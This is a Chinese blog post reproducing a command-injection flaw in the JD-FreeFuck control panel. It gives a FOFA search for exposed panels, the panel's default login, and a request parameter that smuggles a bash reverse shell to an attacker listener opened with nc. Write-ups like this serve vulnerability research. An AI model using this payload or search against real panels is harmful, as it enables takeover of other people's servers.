JD-FreeFuck 后台命令执行漏洞

最新推荐文章于 2024-09-03 10:43:35 发布
最新推荐文章于 2024-09-03 10:43:35 发布
阅读量1.7w 收藏 1
点赞数 1
分类专栏: 安全 文章标签: docker 安全 shell linux git
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tomyyyyyy/article/details/115714219
版权
本文详细介绍了JD-FreeFuck项目存在的后台命令执行漏洞,该漏洞允许攻击者执行任意命令,控制服务器。通过FOFA搜索引擎可以找到受影响的系统,登录凭证为useradmin/supermanito。漏洞复现过程包括手动执行脚本和利用命令反弹shell。建议相关用户及时修复此安全问题。
摘要由CSDN通过智能技术生成

JD-FreeFuck 后台命令执行漏洞

漏洞说明

JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器

项目地址:https://github.com/meselson/JD-FreeFuck

环境搭建

脚本一键部署:

bash <(curl -sSL https://gitee.com/mjf521/JD-FreeFuck/raw/main/install.sh)

漏洞复现

FOFA搜索

title="京东薅羊毛控制面板"

访问后登录页面

image-20210413180417572

默认用户名密码:

useradmin
supermanito

image-20210413180601261

手动执行脚本---切换换行抓包

![屏幕截图 2021-04-14 100803](https://tomyyyyy.oss-cn-hangzhou.aliyuncs.com/img/屏幕截图 2021-04-14 100803.jpg)

然后发送包:

Snipaste_2021-04-14_10-17-58

反弹shell

cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2F192.168.1.101%2F44444+%3C%261'%3B+now

监听端:

nc -lvvp 44444
tomyyyyy
关注
专栏目录
JD-FreeFuck 后台RCE漏洞
weixin_51387754的博客
11-05 8740
漏洞简介 RCE英文全称:remote command/code execute 分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞漏洞复现 fofa语法
JD-FreeFuck 京东薅羊毛控制面板 后台命令执行漏洞
孤桜懶契
04-22 2504
漏洞描述 i ⭐JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器 项目地址: https://github.com/meselson/JD-FreeFuck 漏洞影响 s ✅JD-FreeFuck 空间测绘 d ⭕FOFAtitle="京东薅羊毛控制面板" 漏洞复现 访问后登录页面如下 ✅ 默认账号useradmin/supermanito POST /runCmd HTTP/1.1 cmd=bash+jd.sh+%3
命令执行详解
最新发布
m0_65409532的博客
09-03 1076
RCE(remote code execute):远程命令执行或者代码执行,我们平时说的rce,比如thinkPHP的rce漏洞,即算代码注入漏洞,也算rce漏洞,因为渗透的最终情况可以实现执行命令或者是代码都属于RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是写文件Getshell都可以属于RCE。
命令执行漏洞
realmels的博客
07-10 893
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 SQL注入(2)——各种注入 SQL注入(3)——SQLMAP SQL注入(4)——实战SQL注入拿webshell Vulnhub靶机渗透之Me and My Girlfriend XSS漏洞 文件上传漏洞 文件.
JD-FreeFuck:《 JD薅羊毛》一键部署用于Linux
02-20
如果您觉得这个项目不错的话可以在右上角给颗 :white_medium_star:吗?方便分享给更多的朋友吗? 通知与更新 2021/2/20通知(重要) 由于lxk0301更新了package.json,导致已部署的朋友所有脚本无法使用提示“请先获取JD账号”,请所有已部署的朋友根据《使用如何卸载此项目更新》中如何卸载此项目的第一条命令删除整个项目文件夹后重新一键部署!注意删除整个项目文件前请先备份您的Cookie,互助码等配置信息,配置文件config.sh已更新到最新的版本。 2021/2/11更新 关于环球挑战赛活动互助码的加入方法 2021/2/8更新 crontab.list了crontab.list定时配置文件目录不正确的问题, run-all.sh了run-all.sh一键执行所有活动脚本关于重复添加疯狂的JOY挂机活动的错误,删除了不该该键执行所有活动脚本中运行的活动,请所有朋友更新,更新命令位于下面的第
Vulhub Supervisord 远程命令执行漏洞复现
weixin_53696027的博客
06-07 334
Vulhub Supervisord 远程命令执行漏洞复现
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 2097
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
2021 HW 漏洞清单汇总 ( 附 poc )
gjgj的博客
04-23 1万+
2021 HW 漏洞清单汇总 2021.4.8——4.22 披露时间 涉及商家/产品漏洞描述 2021/04/08启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞(历史漏洞) CNVD-2021-17391 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793 2021/04/08禅道项目管理软件11.6禅道 11.6 sql注...
朴素贝叶斯色情类网站内容识别
热门推荐
ckbbird的博客
06-05 2万+
    随着网络/信息安全攻防的不断升级,传统的安全检测方法已经不能够满足新的安全威胁,大数据以及机器学习的方法越来越多的被应用到安全领域,本文研究了一种将贝叶斯算法应用到恶意内容识别的方法,不属于新方法,仅做实践验证.    首先确定识别的恶意内容为-色情类,方法最终可推广到博彩类,钓鱼网站类等等.为了提取色情类网站内容通用关键词,需要编写网站爬虫工具,爬取敏感关键字.为了对付动态网页内容以及j...
CVE-2021-22205 GitLab 远程命令执行漏洞复现
qq_50854662的博客
01-05 731
CVE-2021-22205 GitLab 远程命令执行漏洞复现
漏洞复现】H3C IMC智能管理中心命令执行漏洞
晚风不及你
02-18 2259
H3C IMC(Intlligent Management Center)智能管理中心是H3C推出的下一代业务只能管理产品。
JD-FreeFuck:《京东薅羊毛》一键部署脚本
03-27
2021/1/11通知:活动列表有所变化,已部署的朋友请执行最新的更新一键更新脚本命令,教程在下方第四部分第3条。 《京东薅羊毛》一键部署脚本对于Linux 用途:通过参与京东商城的各种活动白嫖京豆,目前每个账号日均100〜200京豆 适用系统:Ubuntu 20&CentOS 8简体中文 Ubuntu正在完善中,但现在仍可用,建议优先使用Ubuntu系统 CentOS本人测试环境为最新的CentOS 8.3,不适用7及以上版本,系统装完后联网即可,如果是最小化安装,请通过SSL方式进入到终端 原作者GitHub项目地址: 此项目核心JavaScript京东活动脚本原作者 此项目Linux环境原作者,已授权,在其问题中有分帖 下面进入正题,部署教程共三步,请认真阅读下面的内容 一,环境一键部署 的Ubuntu wget --no-check-certificate -O install.
FreeFuck
03-27
如果您觉得这个项目不错的话可以在右上角给颗 :star:吗?您的支持是我最大的动力,方便分享给更多的朋友吗? 通知与更新 更新代表有新的内容增加,您可以更新也可以继续使用之前的版本,不影响当前使用,除非说明需要重新部署修复代表有错误已经修复完毕需要您执行相关命令解决相应的问题,如有特殊命令需要执行会在维基首页发布通知代表有新的内容或信息需要您了解,请确保已仔细阅读所有通知内容 2021/3/26 15:00重要通知ㅤ上源活动脚本库暂时关闭,项目暂停使用! 2021/3/25 14:40更新ㅤ更新了控制面板,为了照顾那些不知道用着什么浏览器别人不卡就他卡的朋友,现在可以重置暂停动态背景。请所有朋友执行git_pull一键更新脚本完成更新。 2021/3/22 10:00更新ㅤ重新塑造了控制面板,全面替换了UI,现在控制面板更好的了。。请所有朋友执行git_pull一键更新git_pull ,然后根
WordPress<= 4.6命令执行漏洞vulhub复现
weixin_45895237的博客
03-18 6426
WordPress <= 4.6(PHPMailer)命令执行漏洞(CVE-2016-10033)
Tomcat后台管理漏洞复现(弱口令+上传webshell)_tomcat文件上传漏洞复现
2401_84183451的博客
04-10 934
1.3将抓到的包发送到爆破模块,快捷键ctrl+i,正常来说是用常见的弱口令字典去爆破,或者更强大的字典进行爆破,为了节省时间,这里就随便输入了几个账号密码。选择,设置三个position1为用户字典,2为3为密码字典,并增加为如下:1.5使用Base64编码提交,由于Burpsuite会自动将符号进行 url 编码,这里需要将 Payload Encoding 的勾给去掉1.6最后发现会破解成功,然后登录后台
手工SQL注入流程与常用语句_sql注入 手工(2),34岁网络安全开发大叔感慨
2401_83974173的博客
04-16 815
1’ and (select count(*) from information_schema.tables where table_schema=database() group by concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e,floor(rand(0)*2)))# 通过修改limit后面数字一个一个爆表。
Tomcat后台管理漏洞复现(弱口令+上传webshell)
weixin_51198941的博客
09-08 3261
Tomcat有一个管理后台,其用户名和密码在Tomcat安装目录下的conf omcat-users.xml文件中配置,不少管理员为了方便,经常采用弱口令。Tomcat 支持在后台部署war包,可以直接将webshell部署到web目录下,如果tomcat后台管理用户存在弱口令,这很容易被利用上传webshell。在可见,用户tomcat拥有上述所有权限,密码是tomcat。正常安装的情况下,tomcat8中默认没有任何用户,且manager页面只允许本地IP访问。
漏洞复现 | CVE-2018-1273 Spring Data Commons 远程命令执行
weixin_42282189的博客
09-15 2126
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。 受影响版本: Spring Data Commons 1.13 – 1.13.10 (Inga.
(CVE-2022-22965)Spring Framework 远程命令执行漏洞(vulfocus复现)
qq_40646572的博客
05-11 921
漏洞是SpringFramework数据绑定的一个漏洞,如果后台方法中接受的参数为非基础类型,Spring会根据前端传入的请求正文中的参数的key值来查询与其名称所对应的getter和setter方法,攻击者利用这一特性修改了Tomcat的一个用于日志记录的类的属性,进而当Tomcat在进行写日志操作的时候,将攻击者传递的恶意代码写入指定目录的指定文件中。
漏洞复现】nginxWebUI 存在前台远程命令执行漏洞
做自己喜欢的事,并将其发挥到极致!
07-09 2569
nginxWebUI是一款图形化管理nginx配置的工具,能通过网页快速配置nginx的各种功能,包括HTTP和TCP协议转发、反向代理、负载均衡、静态HTML服务器以及SSL证书的自动申请、续签和配置,配置完成后可以一键生成nginx.conf文件,并控制nginx使用此文件进行启动和重载。nginxWebUI 存在前台远程命令执行漏洞,攻击者通过该漏洞获取服务器控制权限进而进一步获取敏感数据信息。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值